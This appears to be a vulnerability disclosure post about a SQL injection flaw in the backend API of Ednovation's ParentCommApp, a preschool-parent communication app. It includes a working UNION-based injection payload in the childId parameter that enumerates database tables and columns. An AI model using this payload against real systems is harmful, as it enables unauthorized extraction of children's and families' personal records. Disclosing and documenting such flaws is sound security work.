Post

[CVE REQUESTED] ParentCommApp SQL Injection Backend API

Summary

A SQL injection vulnerability was identified in a backend API supporting Ednovation’s ParentCommApp — a communication platform used by preschools and parents. The vulnerability allows attackers to manipulate request parameters and potentially extract unauthorized records from the database.

Ednovation, headquartered in Singapore, is a leading provider of preschool education services across Asia, has evolved into a chain of more than 60 pre-schools and enrichment centres across Singapore, China and ASEAN.

Background & Discovery

This issue was discovered while testing the ParentCommApp on iOS, where traffic was intercepted using Burp Suite. After logging in and intercepting traffic, it was observed that the API call used to fetch child attendance status did not include any form of validation and accepted unsanitized input — indicating a server-side flaw rather than a client implementation issue.

Affected Product

  • Vendor: Ednovation
  • App: ParentCommApp (iOS)
  • Platform: Backend APIs serving iOS/Android apps
  • Version: Affected prior to 2022 remediation

Vulnerability Details

While testing the iOS version of ParentCommApp using Burp Suite, an API call responsible for fetching child attendance status was observed to be vulnerable to SQL injection.

The vulnerable API accepted a childId parameter via POST request body and failed to sanitize the input. Manual testing with SQL payloads like:

1
'date=Sun%20Jun%2026%2016%3A19%3A23%20GMT%2B0800%202022&childId=12 UNioN \x0d\x0a  (\x0d\x0a    SELECT 111, 222, 333, 444, 555, 666, 777, 888, 999, 101010,\x0d\x0a      group_concat(a.combine separator \',\'), \x0d\x0a      121212, 131313, 141414   \x0d\x0a    from \x0d\x0a      (\x0d\x0a        SELECT \x0d\x0a          concat(\x0d\x0a            \'\"\', \x0d\x0a            table_name, \x0d\x0a            \'\"\', \x0d\x0a            \':\', \x0d\x0a            \'[\', \x0d\x0a            GROUP_CONCAT(\x0d\x0a              concat(\'\"\', COLUMN_NAME, \'\"\') separator \',\'\x0d\x0a            ), \x0d\x0a            \']\'\x0d\x0a          ) as combine \x0d\x0a        FROM \x0d\x0a          INFORMATION_SCHEMA.COLUMNS \x0d\x0a        WHERE \x0d\x0a          TABLE_SCHEMA = \'dev_XXXX\' \x0d\x0a        GROUP BY \x0d\x0a          TABLE_NAME \x0d\x0a        ORDER BY \x0d\x0a          table_name\x0d\x0a      ) as a\x0d\x0a  )\x0d\x0alimit 1,2#&action=getChildAttendanceStatus'

resulted in expanded database output, confirming an authentication-independent injection flaw.

Exploitation Impact

  • Sensitive data disclosure: Unauthorized access to other child/parent/teacher records
  • Database enumeration: Potential for data extraction beyond target record

Mitigation

Vendors should validate and sanitize all input parameters server-side. Use parameterized queries and ORM frameworks to prevent injection flaws.

Timeline

  • 2022-07: Issue discovered and responsibly reported to vendor
  • 2022-07: Vendor acknowledged and deployed a patch
  • 2025-07: Public disclosure and CVE request initiated
This post is licensed under CC BY 4.0 by the author.